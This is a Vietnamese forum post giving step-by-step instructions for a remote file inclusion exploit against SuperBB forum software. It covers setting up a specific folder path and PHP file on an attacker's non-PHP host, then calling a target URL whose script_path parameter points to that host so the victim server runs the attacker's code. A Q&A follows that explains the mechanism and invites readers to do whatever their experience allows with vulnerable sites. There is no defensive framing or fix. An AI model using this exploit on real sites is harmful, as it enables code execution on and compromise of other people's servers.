Khai thác lỗi bảo mật forum SuperBB :
trang này đã được đọc lần
Tạo trên host
http://[attacker]/lang/1/1_options.phpChạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_code=1
Cách test:
1. Đăng ký một host ko support PHP.
2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1, trong folder 1 tạo một file tên là 1_options.php với nội dung như sau:
CODE
<? echo "Hello world"; ?>
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_code=1
Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này
Câu hỏi:1. SupperBB vuln là gì?
Trả lời :
2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho )
3. Host ko support php thì làm sao hiển thị cái file 1_options.php được?
4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php , mục đích là để làm gì?
5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó?
1. Là lỗi bảo mật của forum SuperBB
2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được (nhưng ko được support PHP)
3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được inject vào code trên host của victim
4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục như thế
5. Làm được gì là tuỳ vào kinh nghiệm mỗi người![]()